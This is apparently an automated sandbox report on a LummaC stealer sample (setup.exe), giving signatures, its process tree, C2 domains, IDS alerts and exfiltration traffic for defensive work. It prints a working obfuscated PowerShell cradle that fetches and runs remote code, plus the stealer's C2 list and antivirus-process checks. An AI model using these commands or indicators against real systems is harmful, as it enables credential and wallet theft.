Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1582503
MD5: d781fd542a1dcb91c07c192bcac16f8e
SHA1: 86ba60cac73d2f28120d452783622e7844e427f0
SHA256: 7d28c7b252fb0b95ea0b5f305e5bb4e781773a9a8582a7cf1076650677263ef0
Tags: de-pumped, exe, user-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • setup.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: D781FD542A1DCB91C07C192BCAC16F8E)
    • powershell.exe (PID: 7672 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ? MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • F3638EZUZ711WUU8SDVPW34XAAMUZ.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • F3638EZUZ711WUU8SDVPW34XAAMUZ.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp (PID: 7936 cmdline: "C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 8100 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5496 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3740 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5812 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3744 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6368 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5804 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5480 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7096 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4456 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 4312 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7368 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4304 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7424 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7412 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4924 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3264 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7564 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3412 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "learningypr.click", "appliacnesot.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "hummskitnj.buzz"], "Build id": "53b39e88--Qh"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4ef5a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: setup.exe PID: 7252 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: setup.exe PID: 7252 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

          System Summary

Source: Process started. One process-creation event (powershell.exe, PID 7672) matched rules by the following authors:
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)

Event fields, identical in every match:
  Command, CommandLine, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
  CommandLine|base64offset|contains: ^
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\setup.exe"
  ParentImage: C:\Users\user\Desktop\setup.exe
  ParentProcessId: 7252
  ParentProcessName: setup.exe
  ProcessId: 7672
  ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T19:10:12.312033+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:13.288627+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:14.567126+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:15.816311+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:17.287015+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:20.610274+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:21.807662+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:25.849669+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:28.623498+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:29.906966+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | TCP
2024-12-30T19:10:30.691182+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 172.67.208.58 | 443 | TCP
2024-12-30T19:10:12.801798+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:13.761440+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:29.102995+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:12.801798+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:13.761440+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:31.106563+0100 | 2008438 | 1 | A Network Trojan was detected | 172.67.208.58 | 443 | 192.168.2.4 | 49746 | TCP
2024-12-30T19:10:21.064381+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | TCP

          AV Detection

Source: https://learningypr.click/api | Avira URL Cloud: Label: malware
Source: https://learningypr.click/apb | Avira URL Cloud: Label: malware
Source: learningypr.click | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop:443/int_clp_sha.txt | Avira URL Cloud: Label: malware
Source: https://learningypr.click/apiS | Avira URL Cloud: Label: malware
Source: https://learningypr.click/apic | Avira URL Cloud: Label: malware
Source: https://learningypr.click/apij | Avira URL Cloud: Label: malware
Source: https://learningypr.click/pp | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/ | Avira URL Cloud: Label: malware
Source: https://learningypr.click/pi | Avira URL Cloud: Label: malware
Source: https://learningypr.click/Q | Avira URL Cloud: Label: malware
Source: https://learningypr.click:443/api | Avira URL Cloud: Label: malware
Source: https://learningypr.click/apies=0F | Avira URL Cloud: Label: malware
Source: https://learningypr.click/apiF | Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt3h | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txt~ | Avira URL Cloud: Label: malware
Source: setup.exe.7252.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "learningypr.click", "appliacnesot.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "hummskitnj.buzz"], "Build id": "53b39e88--Qh"}
Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe | ReversingLabs: Detection: 39%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 87.4% probability
Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb< source: powershell.exe, 00000004.00000002.2025410025.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DCE06
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007C7F9F
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DCF93
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DCF89

          Networking

          Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.32.1:443
          Source: Joe Sandbox View | IP Address: 104.21.32.1
          Source: Joe Sandbox View | IP Address: 185.161.251.21
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.208.58:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49746
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 78 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=RVM1PD4RW0Q7YUQJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18150 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KKG02N6EU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8729 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=POEN4VU2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20376 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Z88PPM2L | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7069 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HXTEUTBDR7M2M2TJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1243 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7DH7ZQOL75A5IGHY65 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 585356 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 113 | Host: learningypr.click
          Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
          Source: global traffic | HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: klipvumisui.shop
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic | DNS traffic detected: DNS query: learningypr.click
          Source: global traffic | DNS traffic detected: DNS query: cegu.shop
          Source: global traffic | DNS traffic detected: DNS query: klipvumisui.shop
          Source: global traffic | DNS traffic detected: DNS query: dfgh.online
          Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: learningypr.click
          Source: setup.exe, 00000000.00000003.1970399938.0000000000988000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1885564075.0000000000987000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841688890.0000000003666000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1947858906.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930354486.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1853872165.0000000003670000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.0000000000988000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1842691314.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/api
          Source: setup.exe, 00000000.00000003.1841688890.0000000003666000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apiF
          Source: setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apiS
          Source: setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apic
          Source: setup.exe, 00000000.00000003.1828202359.000000000094A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apies=0F
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apij
          Source: setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/pi
          Source: setup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/pp
          Source: setup.exe, 00000000.00000003.1828202359.0000000000904000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.000000000096D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click:443/api
          Source: powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
